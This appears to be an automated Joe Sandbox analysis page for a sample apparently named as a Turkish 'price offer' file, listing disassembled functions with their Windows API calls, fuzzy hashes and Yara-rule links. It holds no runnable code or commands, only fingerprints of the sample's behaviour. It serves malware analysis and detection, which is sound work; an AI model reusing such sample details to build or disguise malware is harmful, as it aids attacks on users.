Opcode Fuzzy Hash: ff0c9822d4cffef1541b35c0ca393e8d53ed66f486da54253beab1e0f5feef4a
Instruction Fuzzy Hash: 57415E31A4C61AFBDF159FA8C844BEEF779FB05320F20871AE425A62D0D7346990CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 009F38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 009F3922
TranslateMessage.USER32(?), ref: 009F394B
DispatchMessageW.USER32(?), ref: 009F3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009F3966

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 9f76264cc2d848c14f0742b5671a3a57272d1f0b436c02b6d40c966dba3fafc8
Instruction ID: f652c307c5cdbc0b5386bad92d04bec2c8a85e86b0e6027454a7484105f57d9e
Opcode Fuzzy Hash: 9f76264cc2d848c14f0742b5671a3a57272d1f0b436c02b6d40c966dba3fafc8
Instruction Fuzzy Hash: FB31F77054434ADEEB35CBB5D848BB637ECAB01351F04856DE662821A0E3FC9AC6CB11

Uniqueness

Uniqueness Score: -1.00%

Function 009FCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 009FCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 009FCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,009FC21E,00000000), ref: 009FCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,009FC21E,00000000), ref: 009FCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,009FC21E,00000000), ref: 009FCFF2

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 950c6c3d6a9a024da9145057f2407522fecd15a054ee028f6c5d0a676511f3b0
Instruction ID: 00f852fb88fc557f54db8264788b0f856fdfa0bd47b94444168435823011db0f
Opcode Fuzzy Hash: 950c6c3d6a9a024da9145057f2407522fecd15a054ee028f6c5d0a676511f3b0
Instruction Fuzzy Hash: F2314CB150420DAFDB20DFA5CA84ABBFBFDEB14351B10842EF616D2141DB34AE41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009E1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 009E1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 009E19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 009E19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 009E19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 009E19E2

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 9b9f30c64515e281a363a8145282481ff444b2395db11c486af02592147b9400
Instruction ID: 17bc8b0c484923f6d39a4726cdbb36ef77b5b87c0e72e61c10770840475d3dba
Opcode Fuzzy Hash: 9b9f30c64515e281a363a8145282481ff444b2395db11c486af02592147b9400
Instruction Fuzzy Hash: 3831D471900259EFCB00CFA9DD99ADE3BB5FB44325F108225F961A72D2C7709D44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A15706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A15745
SendMessageW.USER32(?,00001074,?,00000001), ref: 00A1579D
_wcslen.LIBCMT ref: 00A157AF
_wcslen.LIBCMT ref: 00A157BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A15816

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 2bb0de54c4b2a73ccefe1fe8b1eddcb330aeb984cde1fdec375bd81643d3015e
Instruction ID: 7c0166f65628e929da0ba22579b15806155c9c6a84e4d753a2e9477b75b42739
Opcode Fuzzy Hash: 2bb0de54c4b2a73ccefe1fe8b1eddcb330aeb984cde1fdec375bd81643d3015e
Instruction Fuzzy Hash: 75217171D04618DADB209FB4CC85AEEB7B9FF85724F108616E929EA1C0D77489C5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A00930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A00951
GetForegroundWindow.USER32 ref: 00A00968
GetDC.USER32(00000000), ref: 00A009A4
GetPixel.GDI32(00000000,?,00000003), ref: 00A009B0
ReleaseDC.USER32(00000000,00000003), ref: 00A009E8

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 4b14ff891bfe735bf534665caa7ba94c3bf479a72363bbeb900bf4fb6821b005
Instruction ID: 88a3685e51a21a0ae63c9892d7b99c484710a27b0602c1f5b8a04bb08fd47452
Opcode Fuzzy Hash: 4b14ff891bfe735bf534665caa7ba94c3bf479a72363bbeb900bf4fb6821b005
Instruction Fuzzy Hash: 99218175600204AFD704EFA5D884FAEBBF5EF84750F048068F95A97362CB70AC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009BCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 009BCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009BCDE9

Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009BCE0F
_free.LIBCMT ref: 009BCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009BCE31

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 584705015fe9664b6cd5b687ee9223379d32bfb1d43030ea0649a3faa56b4342
Instruction ID: f5398f2c1febbf07e0f1ff8cfde0f8282f95b8159329c5221bd0bfc852d252f4
Opcode Fuzzy Hash: 584705015fe9664b6cd5b687ee9223379d32bfb1d43030ea0649a3faa56b4342
Instruction Fuzzy Hash: 6C01A7B2601615BF63215AF66D8CDFBBA6DDEC6FB13154129FD05DB201EA61CD0281B0

Uniqueness

Uniqueness Score: -1.00%

Function 0099990C Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009998CC
SetTextColor.GDI32(?,?), ref: 009998D6
SetBkMode.GDI32(?,00000001), ref: 009998E9
GetStockObject.GDI32(00000005), ref: 009998F1
GetWindowLongW.USER32(?,000000EB), ref: 00999952

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: ecd378060967a8d880973097fd0b35e9f2c52d0354ece0db1ad958aae41aa911
Instruction ID: 203b8c6403b8627a81f20841fc79157205e9da8fc1b2f84656db6cbf403fbf46
Opcode Fuzzy Hash: ecd378060967a8d880973097fd0b35e9f2c52d0354ece0db1ad958aae41aa911
Instruction Fuzzy Hash: 68210431186290AFDF228F7DEC59AE93F68AB13331F18825DF5A24A1A1C7314952CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00999639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00999693
SelectObject.GDI32(?,00000000), ref: 009996A2
BeginPath.GDI32(?), ref: 009996B9
SelectObject.GDI32(?,00000000), ref: 009996E2

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2378a7e4114bb2749d39a2c1d6fd798f57fad0b0e8b45d081808b710f874ea1c
Instruction ID: 1ded7ffd045e6878e8b8ab5e031363400b2194e982298cdebec69817a718d0cd
Opcode Fuzzy Hash: 2378a7e4114bb2749d39a2c1d6fd798f57fad0b0e8b45d081808b710f874ea1c
Instruction Fuzzy Hash: E8215E70842305EBDF11DFECEC187F97BA9BB51366F10421AF411A61B0D3759892CB94

Uniqueness

Uniqueness Score: -1.00%

Function 009E5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 009E5726
_memcmp.LIBVCRUNTIME ref: 009E5744
_memcmp.LIBVCRUNTIME ref: 009E5757
_memcmp.LIBVCRUNTIME ref: 009E576F
_memcmp.LIBVCRUNTIME ref: 009E5787

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 4292aed827180ebca4c7f9e7eb6147a0ca838dc7eadef073f5c85a5cba4ab5df
Instruction ID: 960c9b7b760e881766902591402f33a3385e489f836b182e393499df42ba8a74
Opcode Fuzzy Hash: 4292aed827180ebca4c7f9e7eb6147a0ca838dc7eadef073f5c85a5cba4ab5df
Instruction Fuzzy Hash: F501B5A2645649FFD60995129D92FFB735DAB61398F014420FD089A242FB62EE6082E0

Uniqueness

Uniqueness Score: -1.00%

Function 009B2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,009AF2DE,009B3863,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6), ref: 009B2DFD
_free.LIBCMT ref: 009B2E32
_free.LIBCMT ref: 009B2E59
SetLastError.KERNEL32(00000000,00981129), ref: 009B2E66
SetLastError.KERNEL32(00000000,00981129), ref: 009B2E6F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: b219b29fb73aaeec2721fa4c214cb93472a8194f608d1214d9fb237d8985b713
Instruction ID: 44fc0d45d83d9bc5758b41114710fa2cc0b56b1f7566e2383ef987bee4fddec0
Opcode Fuzzy Hash: b219b29fb73aaeec2721fa4c214cb93472a8194f608d1214d9fb237d8985b713
Instruction Fuzzy Hash: F801283624561077C613A7BA6F45EEB266DEBC67B1B218928F839A31D3EF34CC024020

Uniqueness

Uniqueness Score: -1.00%

Function 009E000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?,?,009E035E), ref: 009E002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?), ref: 009E0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0070

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 7b9130e45e97e5fa893c230d6184bc6a161983023509443264d8e6ea79906c20
Instruction ID: a3fe718896204edad7339ad6e7920be0aadc8b4ab36613cabbca820ca0144a1b
Opcode Fuzzy Hash: 7b9130e45e97e5fa893c230d6184bc6a161983023509443264d8e6ea79906c20
Instruction Fuzzy Hash: 7701A272640204BFDB129FAADC44BEA7AEDEF84762F148124F905D6210E7B5DD81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009EE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 009EE997
QueryPerformanceFrequency.KERNEL32(?), ref: 009EE9A5
Sleep.KERNEL32(00000000), ref: 009EE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 009EE9B7
Sleep.KERNEL32 ref: 009EE9F3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 01d812a32de7f61f79a3ed5d47116a7526f8c0b75486049c93d4ce4e8a5df8c1
Instruction ID: 3b5a89c777ee7d6643093cdaf312ad96d6a29b9baae15993568e521abaca6820
Opcode Fuzzy Hash: 01d812a32de7f61f79a3ed5d47116a7526f8c0b75486049c93d4ce4e8a5df8c1
Instruction Fuzzy Hash: 88015731C41A2DEBCF00EBE6DD49AEDBBB8BB09310F004646E502B2242CB349951CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009E10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009E1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009E114D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: c8d36f3174ef87025c3fb3cc62d6c8730e7e6a29dd7f9ebb11ed360407dcc031
Instruction ID: 0e60b4c22cc482286f04efb8929485fe74e0a5dc82a7288b6856063893b59d2c
Opcode Fuzzy Hash: c8d36f3174ef87025c3fb3cc62d6c8730e7e6a29dd7f9ebb11ed360407dcc031
Instruction Fuzzy Hash: 6A013179140315BFDB128FA5DC49EAA3F6EEF85370B104415FA45D7350DB71DC119A60

Uniqueness

Uniqueness Score: -1.00%

Function 009E0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009E0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009E0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009E0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009E0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009E1002

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9ce05c95fbc6ff211437d106105ea4da739661f84af4ba035856bc36c4ab5e8f
Instruction ID: 15276874f6f6bf46c4a997959934cf6ba1553868c15792de3e28c7cafe1c3520
Opcode Fuzzy Hash: 9ce05c95fbc6ff211437d106105ea4da739661f84af4ba035856bc36c4ab5e8f
Instruction Fuzzy Hash: 8FF06239180351FBD7218FE5DC4DF963B6EEF89762F118414F945C72A1CA70DC418A60

Uniqueness

Uniqueness Score: -1.00%

Function 009E1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009E102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009E1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009E104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1062

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3ed91daf360af567bbb4adcb909725aa20f4207833e0f7bf15c7ef9fd26a473f
Instruction ID: 686bc66e76c70a22fc60c60fff614478a26bd75941b4f32c6490b216dd644280
Opcode Fuzzy Hash: 3ed91daf360af567bbb4adcb909725aa20f4207833e0f7bf15c7ef9fd26a473f
Instruction Fuzzy Hash: 99F06D39280351FBDB229FE5EC49F963BAEEF89762F114424FA45C7250CA70DC418A60

Uniqueness

Uniqueness Score: -1.00%

Function 009F030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0324
CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0331
CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F033E
CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F034B
CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0358
CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0365

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c0ecae9755810f8691e6523db7e8f8bbccd24ab10d242b0c2edfe98e3fca2ac2
Instruction ID: 1403471d0aa1a7f51ba2514851dc518f684bbf2eea578c5903b548ceaae1ee71
Opcode Fuzzy Hash: c0ecae9755810f8691e6523db7e8f8bbccd24ab10d242b0c2edfe98e3fca2ac2
Instruction Fuzzy Hash: A801A272800B199FCB309F66D880822F7F9BF903153158A3FD29652932C3B1A955CF80

Uniqueness

Uniqueness Score: -1.00%

